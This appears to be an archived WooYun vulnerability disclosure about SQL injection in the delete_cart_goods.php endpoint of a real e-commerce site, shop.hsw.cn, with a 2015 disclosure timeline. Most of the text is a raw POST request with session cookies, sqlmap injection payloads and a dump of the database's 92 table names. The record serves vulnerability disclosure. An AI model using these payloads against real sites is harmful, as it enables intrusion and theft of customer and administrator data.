乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-22: 厂商已经确认,细节仅向厂商公开 2015-11-01: 细节向核心白帽子及相关领域专家公开 2015-11-11: 细节向普通白帽子公开 2015-11-21: 细节向实习白帽子公开 2015-12-06: 细节向公众公开
POST /delete_cart_goods.php HTTP/1.1Content-Length: 8Content-Type: application/x-www-form-urlencodedReferer: http://shop.hsw.cnCookie: ECS_ID=de0274a92a99737ba31bb993571ca80d1ead0780; ECS[visit_times]=1; ECS[display]=grid; ECS[history]=123%2C179; ECSCP_ID=7ca343b036c08cfc9b0c4c4ec4861e7377cbe7adHost: shop.hsw.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*id=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1 RLIKE (SELECT (CASE WHEN (9278=9278) THEN 1 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: id=1 AND EXTRACTVALUE(8010,CONCAT(0x5c,0x7176787671,(SELECT (ELT(8010=8010,1))),0x7162707671)) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id=1 AND 8196=BENCHMARK(5000000,MD5(0x4464764c))---back-end DBMS: MySQL 5.1Database: shop[92 tables]+-------------------------+| ecs_account_log || ecs_ad || ecs_ad_custom || ecs_ad_position || ecs_admin_action || ecs_admin_log || ecs_admin_message || ecs_admin_user || ecs_adsense || ecs_affiliate_log || ecs_agency || ecs_alipay_log || ecs_area_region || ecs_article || ecs_article_cat || ecs_attribute || ecs_auction_log || ecs_auto_manage || ecs_back_goods || ecs_back_order || ecs_bonus_type || ecs_booking_goods || ecs_brand || ecs_card || ecs_cart || ecs_cat_recommend || ecs_category || ecs_collect_goods || ecs_comment || ecs_crons || ecs_delivery_goods || ecs_delivery_order || ecs_email_list || ecs_email_sendlist || ecs_error_log || ecs_exchange_goods || ecs_favourable_activity || ecs_feedback || ecs_friend_link || ecs_goods || ecs_goods_activity || ecs_goods_article || ecs_goods_attr || ecs_goods_cat || ecs_goods_gallery || ecs_goods_type || ecs_group_goods || ecs_keywords || ecs_link_goods || ecs_mail_templates || ecs_member_price || ecs_nav || ecs_order_action || ecs_order_goods || ecs_order_info || ecs_order_jifen || ecs_order_message || ecs_pack || ecs_package_goods || ecs_pay_log || ecs_payment || ecs_plugins || ecs_products || ecs_rcq_info || ecs_reg_extend_info || ecs_reg_fields || ecs_region || ecs_role || ecs_searchengine || ecs_sessions || ecs_sessions_data || ecs_shipping || ecs_shipping_area || ecs_shop_config || ecs_snatch_log || ecs_stats || ecs_suppliers || ecs_tag || ecs_template || ecs_topic || ecs_user_account || ecs_user_address || ecs_user_bonus || ecs_user_feed || ecs_user_rank || ecs_users || ecs_virtual_card || ecs_volume_price || ecs_vote || ecs_vote_log || ecs_vote_option || ecs_wholesale |+-------------------------+
危害等级:中
漏洞Rank:6
确认时间:2015-10-22 09:57
正在处理
暂无